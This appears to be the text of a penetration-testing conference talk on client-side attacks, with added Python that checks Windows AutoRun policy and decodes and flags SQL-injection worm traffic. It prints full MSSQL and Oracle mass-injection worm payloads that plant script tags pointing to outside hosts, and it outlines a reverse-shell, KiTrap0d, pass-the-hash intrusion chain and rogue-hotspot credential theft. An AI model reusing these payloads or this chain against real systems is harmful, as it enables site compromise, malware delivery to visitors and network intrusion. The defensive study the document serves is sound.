Client-side exploitation techniques: attack the client side, then get access into the intranet, for fun. Also covers the latest Microsoft vulnerability, which went unpatched for a year (MS sucked...).
Tactical Assassins : Client-Side OWNage
Who am I ?!
- Prathan Phongthiproek, ACIS Professional Center, Senior Information Security Consultant
- Instructor / Speaker
- Red Team: Penetration Tester (Team Leader)
- Security Consultant / Researcher, CWH Underground
- Exploits and vulnerabilities disclosure: Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc.
Let's Talk !
- Attack Layer 8: Client-Side OWNage
  - MS Office (Evil Macro)
  - Malicious Adobe PDF
  - Malicious USB
  - One-Click Attack
  - Evil-Twin Attack
- Built-in Pen-Test Tactics
  - Black Hat versus White Hat
  - Using Black Hat styles to compromise systems
- Operation CloudBurst
Client-Side OWNage The Way to Attack Layer 8!
MS Office (Evil Macro) !
MS Office is Evil !!
Malicious Adobe PDF !
Malicious PDF File
Malicious USB !
AutoPlay is NOT AutoRun
Turning off AutoPlay is not enough: the host is still vulnerable to an evil USB device, because autorun.inf is processed by AutoRun, while the AutoPlay setting only controls the prompt.
Disable AutoRun for every drive type instead, by setting the NoDriveTypeAutoRun value to 0xff under:
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
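The slide's registry fix, turned into something you can check. This is an added example, not code from the deck: it decodes the NoDriveTypeAutoRun bitmask (bit meanings as Microsoft documents them, a set bit disables AutoRun for that drive type; 0x91 is the documented XP/Vista-era default) and, on Windows, reads the current value from the Policies\Explorer key named above. The assumption that a malicious USB device can appear as a removable, fixed or CD-ROM drive (U3-style "virtual CD" sticks) is mine, as is checking HKLM as well, since a machine policy there takes precedence over the HKCU value.

```python
"""Does the NoDriveTypeAutoRun policy actually cover an evil USB device?

Added example, not code from the deck. The bit meanings are the documented
NoDriveTypeAutoRun bitmask; 0x91 is the documented XP/Vista-era default. The
registry read is optional and Windows-only; everything else runs anywhere.
"""
import sys

# Bit -> drive type. A SET bit disables AutoRun for that drive type.
DRIVE_TYPE_BITS = {
    0x01: "DRIVE_UNKNOWN",
    0x02: "DRIVE_NO_ROOT_DIR",
    0x04: "DRIVE_REMOVABLE",  # USB flash drives
    0x08: "DRIVE_FIXED",      # hard disks, including USB hard disks
    0x10: "DRIVE_REMOTE",     # network shares
    0x20: "DRIVE_CDROM",      # optical media and U3-style "virtual CD" USB devices
    0x40: "DRIVE_RAMDISK",
    0x80: "RESERVED",
}
DEFAULT_VALUE = 0x91   # documented default: only unknown, remote and reserved are disabled
ALL_DISABLED = 0xFF    # the value recommended on the slide

# Assumption: drive types a malicious USB device can show up as
EVIL_USB_TYPES = {"DRIVE_REMOVABLE", "DRIVE_FIXED", "DRIVE_CDROM"}

POLICY_PATH = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"


def autorun_still_enabled(value):
    """Drive types for which AutoRun is still active under this bitmask."""
    return [name for bit, name in DRIVE_TYPE_BITS.items() if not value & bit]


def covers_evil_usb(value):
    """True only if removable, fixed AND CD-ROM drives are all disabled."""
    return not (EVIL_USB_TYPES & set(autorun_still_enabled(value)))


def read_policy_value(hive="HKCU"):
    """Read NoDriveTypeAutoRun from HKCU or HKLM (Windows only).

    A missing key or value means the built-in default applies. HKLM takes
    precedence over HKCU when both are set, so check both hives.
    """
    if sys.platform != "win32":
        return None
    import winreg
    root = winreg.HKEY_LOCAL_MACHINE if hive == "HKLM" else winreg.HKEY_CURRENT_USER
    try:
        with winreg.OpenKey(root, POLICY_PATH) as key:
            value, _kind = winreg.QueryValueEx(key, "NoDriveTypeAutoRun")
            return int(value)
    except FileNotFoundError:
        return DEFAULT_VALUE


def report(value):
    """Human-readable verdict for one bitmask value."""
    left = autorun_still_enabled(value)
    verdict = "OK" if covers_evil_usb(value) else "STILL EXPOSED"
    return f"NoDriveTypeAutoRun=0x{value:02X}: {verdict}; AutoRun enabled for {left or 'nothing'}"


if __name__ == "__main__":
    for v in (DEFAULT_VALUE, 0xDF, ALL_DISABLED):
        print(report(v))
    for hive in ("HKLM", "HKCU"):
        current = read_policy_value(hive)
        if current is not None:
            print(hive, report(current))
```

The interesting case is a value like 0xDF: every bit except CD-ROM is set, removable drives are covered, and a stick that presents a virtual CD-ROM still gets its autorun.inf honoured. Only 0xFF (or at least the 0x2C bits) closes all three doors.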
One-Click Attack !
SQL Injection Worms - MSSQL !
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
The same request with the hex CAST decoded (it is UTF-16LE text), i.e. the T-SQL that EXEC(@S) actually runs:
';DECLARE @S NVARCHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.fengnima.cn/k.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS NVARCHAR(4000));EXEC(@S);--
The cursor walks every user table (xtype='u') and every text-typed column (xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar) and appends the attacker's script tag to each value, so every visitor of the compromised site loads the attacker's JavaScript.
SQL Injection Worms - Oracle !
http://127.0.0.1:81/ora4.php?name=1 and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)||chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)|| chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE rec.foo;end loop;execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--
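Both worm payloads above are obfuscated so that a naive filter never sees the word "update" or a script tag: the MSSQL one hides the T-SQL as UTF-16LE hex inside CAST(0x... AS NVARCHAR(4000)), the Oracle one spells out its statement with chr(117)||chr(112)||... (decoded, the loop body is update <table> set <col>=<col>||'<script src="http://www.notsosecure.com/test.js"></script>' for every VARCHAR column longer than 200 in the USERS tablespace, run through the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES injection vector with SYS rights). The decoder below is an added example, not code from the deck: it undoes both encodings on a captured request line and flags the worm behaviour. The sample request lines are constructed for this example; the MSSQL sample is the slide's decoded T-SQL re-encoded the way the worm sends it, with attacker.invalid standing in for the script host, and the Oracle sample is an abbreviated copy of the slide's chr() payload.

```python
"""Decode the two obfuscations used by the SQL-injection worms on the slides.

Added example, not code from the deck. Both sample request lines are
constructed; attacker.invalid is a placeholder for the worm's script host.
"""
import re
from urllib.parse import unquote_plus

# MSSQL worm: CAST(0x<hex> AS NVARCHAR(4000)), the hex being UTF-16LE T-SQL.
# \s* before AS because in the slide's capture the hex and "AS" run together.
CAST_HEX = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s*AS\s+N?VARCHAR", re.I)
# Oracle worm: chr(117)||chr(112)||... runs spelling out the real statement.
CHR_RUN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*\|\|\s*chr\(\s*\d+\s*\))*", re.I)
CHR_ONE = re.compile(r"chr\(\s*(\d+)\s*\)", re.I)


def decode_cast_hex(sql):
    """Replace each hex CAST with <<the T-SQL it executes>>; tolerates truncation."""
    def repl(m):
        hexdigits = m.group(1)
        if len(hexdigits) % 2:            # capture cut mid-byte: drop the stray nibble
            hexdigits = hexdigits[:-1]
        text = bytes.fromhex(hexdigits).decode("utf-16-le", errors="replace")
        return "CAST(<<" + text + ">> AS NVARCHAR"
    return CAST_HEX.sub(repl, sql)


def decode_chr_runs(sql):
    """Replace each chr()||chr() run with the SQL string literal it builds."""
    def repl(m):
        text = "".join(chr(int(n)) for n in CHR_ONE.findall(m.group(0)))
        return "'" + text.replace("'", "''") + "'"
    return CHR_RUN.sub(repl, sql)


def decode_payload(request_line):
    """URL-decode a captured query string, then undo both obfuscations."""
    return decode_chr_runs(decode_cast_hex(unquote_plus(request_line)))


# What the worms do once decoded: walk the schema, append a script tag to every text column.
WORM_MARKERS = [
    ("mssql cursor over sysobjects/syscolumns", re.compile(r"sysobjects.*syscolumns", re.I | re.S)),
    ("oracle cursor over ALL_TAB_COLUMNS", re.compile(r"\bALL_TAB_COLUMNS\b", re.I)),
    ("mass UPDATE of text columns", re.compile(r"\bupdate\b.*\bset\b", re.I | re.S)),
    ("injected script tag", re.compile(r"<script\b", re.I)),
]


def worm_indicators(request_line):
    """Names of the worm behaviours found in the decoded payload."""
    decoded = decode_payload(request_line)
    return [name for name, rx in WORM_MARKERS if rx.search(decoded)]


# --- constructed samples ---------------------------------------------------
_TSQL = (
    "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and "
    "a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']="
    "rtrim(convert(varchar,['+@C+']))+''<script src=http://attacker.invalid/k.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
MSSQL_REQUEST = ("/page.asp?id=1';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
                 + _TSQL.encode("utf-16-le").hex().upper()
                 + "AS%20NVARCHAR(4000));EXEC(@S);--")

ORACLE_REQUEST = (
    "/ora4.php?name=1 and 1=(select ... for rec in (select "
    "chr(117)||chr(112)||chr(100)||chr(97)||chr(116)||chr(101)||chr(32)||T.TABLE_NAME||"
    "chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name||chr(61)||C.column_name||"
    "chr(124)||chr(124)||chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||"
    "chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE "
    "T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83) and "
    "C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)||chr(65)||chr(82)||chr(37)"
    ") loop EXECUTE IMMEDIATE rec.foo;end loop; ...) from dual)--"
)

if __name__ == "__main__":
    for req in (MSSQL_REQUEST, ORACLE_REQUEST):
        print(decode_payload(req))
        print("indicators:", worm_indicators(req), "\n")
```

Run over web-server access logs, worm_indicators() is a cheap way to triage the mass-injection traffic of that era; the decoders are the useful part, since the raw request line shows neither an UPDATE nor a script tag, and a truncated capture (odd number of hex digits, as on the MSSQL slide) still decodes everything that was logged.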
(Diagram: the victim follows a link to the malicious website -> reverse shell to the attacker)
Evil-Twin Attack !
Karma + Metasploit = Karmetasploit !!
Rogue Access Point (Evil Twin): steal usernames, passwords and information from public wireless hotspots
Why not steal something evil, like credit cards (pay to play)?
Built-in Pen-Test Tactics !
Black Hat versus White Hat! Thinking Outside of the Box
- Know one piece of information and expand from there
- Compromise every system, then go after the target
- All methodologies integrated
- Manual footprinting, no noisy scanning: just Nmap and 0-day attacks
- Attack Layer 8: Client-Side OWNage
Thinking Inside the Box
- Assigned a limited block of IP addresses
- Unable to go beyond the approved scope: only touch xyz hosts, don't touch abc host
- Follow pen-test methodologies: OSSTMM, NIST, ISSAF
- Download exploits from Milw0rm; exploit with Core Impact, CANVAS, Metasploit
- Oops, I cannot hack the user.
Pen-testers must think outside the box
Attack Layer 8: more effective results
Pen-test with Black Hat styles
Using a Black Hat mind:
- Email address enumeration
- Social networking (Maltego)
- Social engineering (Adobe PDF, Evil Macro, One-Click Attack, IE Aurora, etc.)
- Information gathering: all subdomains (xyz.victim.com, abc.victim.com, 123.victim.com)
- Blind test: compromise every system, then go after the target
Using Black Hat styles to compromise systems
Operation CloudBurst!
MS Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
Affects every 32-bit release of the Windows NT kernel (Windows 2000, XP, Server 2003, Vista, Server 2008, 7)
Not affected: Windows 7 (64-bit), Windows Server 2008 (64-bit, Itanium)
Patch released as MS10-015 on Feb 9, 2010
Public 0-day for about a month. W00t ! W00t !
KiTrap0d – Local Ring0 Kernel Exploit
Get The Hell Outta Here !!
Token Kidnapping – Elevate Privilege
A token is to Windows what a cookie is to the web
- On Windows XP / 2003, Windows services run as the SYSTEM account: compromise of a service == full system compromise
- On Windows Vista / 2008, LocalService / NetworkService == SYSTEM
- Affects Windows 2000, XP, Server 2003, Vista and Server 2008
- Patch released as MS09-012 on April 14, 2009
- 0-day for 1 year. W00t ! W00t !!
Black Hat Mind !! Combine Attack Layer 8 + KiTrap0d + Token Kidnapping
- Start the mission with Attack Layer 8: spam mail / 1-click ownage -> reverse shell to the attacker
- KiTrap0d – the message from slave to God: 0-day ring0 exploit, all 32-bit Windows OS
- Maintain access: pivot (tunneling), backdoor position
- Compromise every system and the Domain Controller: impersonate tokens, pass-the-hash attack
(Diagram: Internet side: reverse shell connection to the attacker. Intranet side: KiTrap0d exploit -> pivot into the network (route add) -> attack the network with pass-the-hash and token impersonation)
If anyone is still in the room... Q&A!
THANK YOU !